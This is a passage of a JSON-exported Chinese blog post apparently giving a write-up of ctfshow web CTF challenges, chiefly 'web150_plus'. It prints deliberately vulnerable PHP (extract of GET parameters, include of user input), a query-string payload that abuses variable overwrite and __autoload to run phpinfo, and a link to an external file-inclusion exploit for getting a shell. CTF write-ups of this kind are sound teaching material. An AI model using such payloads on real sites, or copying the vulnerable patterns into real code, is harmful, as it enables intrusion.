src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20221008223633014\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h2>\u65e5\u5fd7\u5305\u542b<\/h2>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202210082248629.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202210082248629.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20221008223919280\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h2>\u83b7\u5f97flag<\/h2>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202210082248630.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202210082248630.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20221008224009091\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h2>Hint<\/h2>\n<p>\u6587\u4ef6\u5305\u542b\u975e\u9884\u671f\u7ed5\u8fc7<\/p>\n<h1>web150_plus<\/h1>\n<pre><code class=\"language-text\">\u4fee\u590d\u4e86\u975e\u9884\u671f<\/code><\/pre>\n<pre><code class=\"language-php\">&lt;?php\ninclude(&quot;flag.php&quot;);\nerror_reporting(0);\nhighlight_file(__FILE__);\n\nclass CTFSHOW{\n    private $username;\n    private $password;\n    private $vip;\n    private $secret;\n\n    function __construct(){\n        $this-&gt;vip = 0;\n        $this-&gt;secret = $flag;\n    }\n\n    function __destruct(){\n        echo $this-&gt;secret;\n    }\n\n    public function isVIP(){\n        return $this-&gt;vip?TRUE:FALSE;\n        }\n    }\n\n    function __autoload($class){\n        if(isset($class)){\n            $class();\n    }\n}\n\n#\u8fc7\u6ee4\u5b57\u7b26\n$key = $_SERVER[&#039;QUERY_STRING&#039;];\nif(preg_match(&#039;\/\\_| |\\[|\\]|\\?\/&#039;, $key)){\n    die(&quot;error&quot;);\n}\n$ctf = $_POST[&#039;ctf&#039;];\nextract($_GET);\nif(class_exists($__CTFSHOW__)){\n    echo &quot;class is exists!&quot;;\n}\n\nif($isVIP &amp;&amp; strrpos($ctf, &quot;:&quot;)===FALSE &amp;&amp; strrpos($ctf,&quot;log&quot;)===FALSE){\n    include($ctf);\n}<\/code><\/pre>\n<p>\u8ddf\u968f\u5927\u5e08\u5085\u7684\u811a\u6b65\uff1a<\/p>\n<pre><code class=\"language-php\">\/?..CTFSHOW..=phpinfo<\/code><\/pre>\n<p><code>ctrl+F<\/code>\u5373\u53ef\u83b7\u5f97flag\uff01\uff01\uff01<\/p>\n<h2>Hint<\/h2>\n<pre><code>\u8fd9\u4e2a\u9898\u4e00\u70b9\u70b9\u5c0f\u5751__autoload()\u51fd\u6570\u4e0d\u662f\u7c7b\u91cc\u9762\u7684\n__autoload \u2014 \u5c1d\u8bd5\u52a0\u8f7d\u672a\u5b9a\u4e49\u7684\u7c7b\n\u6700\u540e\u6784\u9020?..CTFSHOW..=phpinfo\u5c31\u53ef\u4ee5\u770b\u5230phpinfo\u4fe1\u606f\u5566\n\u539f\u56e0\u662f..CTFSHOW..\u89e3\u6790\u53d8\u91cf\u6210__CTFSHOW__\u7136\u540e\u8fdb\u884c\u4e86\u53d8\u91cf\u8986\u76d6\uff0c\u56e0\u4e3aCTFSHOW\u662f\u7c7b\u5c31\u4f1a\u4f7f\u7528\n__autoload()\u51fd\u6570\u65b9\u6cd5\uff0c\u53bb\u52a0\u8f7d\uff0c\u56e0\u4e3a\u7b49\u4e8ephpinfo\u5c31\u4f1a\u53bb\u52a0\u8f7dphpinfo\n\u63a5\u4e0b\u6765\u5c31\u53bbgetshell\u5566<\/code><\/pre>\n<p>exp :<a href=\"https:\/\/github.com\/vulhub\/vulhub\/blob\/master\/php\/inclusion\/exp.py\">https:\/\/github.com\/vulhub\/vulhub\/blob\/master\/php\/inclusion\/exp.py<\/a><\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202210082248631.jpg'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202210082248631.jpg\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" style=\"zoom:50%;\" \/><\/div><\/p>\n","protected":false},"excerpt":{"rendered":"<p>web114 &lt;?php error_reporting(0); highlight_file(__FI [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":294,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,18],"tags":[],"class_list":["post-296","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-ctf-and-protest","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/296","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=296"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/296\/revisions"}],"predecessor-version":[{"id":297,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/296\/revisions\/297"}],"wp:featuredmedia":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media\/294"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=296"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=296"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=296"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}